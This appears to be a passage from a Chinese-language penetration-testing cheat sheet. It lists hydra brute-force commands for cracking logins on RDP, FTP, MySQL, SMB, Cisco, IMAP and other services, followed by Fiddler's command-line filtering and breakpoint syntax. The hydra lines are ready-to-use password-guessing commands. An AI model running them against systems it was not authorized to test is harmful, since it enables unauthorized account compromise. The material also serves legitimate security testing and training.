 -P telnetpass.txt -f -vV  -e ns  -o save.log  telnet://172.16.255.253

4.)破解rdp

hydra 192.168.1.104 rdp -L user.txt -P pass.txt -V

5.破解ftp

hydra 192.168.1.1 ftp  -L user.txt -P pass.txt -t 10 -v 

6.破解mysql

hydra 192.168.1.104 -L user.txt -P pass.txt -V mysql

破解协议层
7.破解https

hydra -m /index.php -l 用户名 -P pass.txt IP https

8.破解teamspeak

hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

9.破解cisco

hydra -P pass.txt IP cisco
hydra -m cloud -P pass.txt IP cisco-enable

10.破解smb

hydra -l administrator -P pass.txt IP smb

11.破解pop3

hydra -l muts -P pass.txt my.pop3.mail pop3

12.破解http-proxy

hydra -l admin -P pass.txt http-proxy://IP

13.破解imap

hydra -L user.txt -p imap://ip PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

参数典型

十五.fiddler

①help
  说明:显示帮助页面。
②?sometext
  说明:Fiddler将会在所有的会话中高亮显示包含sometext的会话。
③ >size | <size
  说明：Fiddler将会在所有的会话中高亮显示响应大于(小于)size字节的会话。
例如：>4000 //40kb
④=status |=method
说明：Fiddler将会在所有的会话中高亮显示响应状态码为status或请求方法为method的会话。
例如：=404 | =post
如图：
⑤@host
  说明：Fiddler将会在所有的会话中高亮显示请求Host头为host的会话。
  例如：@vulns.org
⑥bold
bold
  说明：Fiddler将会把bold后面的URL粗体显示。
  例如：bold /test/index.php
⑦bpafter
  说明：如果请求的URL中包含我们设定的字符串,该URL便会在响应时中断。
  例如：bpafter /index.php
⑧bps
  说明：如果HTTP响应的状态码为我们设定的值,URL便会在响应时中断。
  例如：bps 200
⑨bpv | bpm
  说明：如果HTTP请求的方法为我们设定的方法,URL便会在请求时中断。
  例如：bpv get
⑩bpu
  说明：如果HTTP请求包含我们设定的URL,那么该URL便会在请求时中断。
  例如：bpu index.php
11.cls | clear
  说明：清除列表中所有的会话。
12.dump
  说明：导出所有的会话到指定的文件。
  例如：dump

未用的一些小工具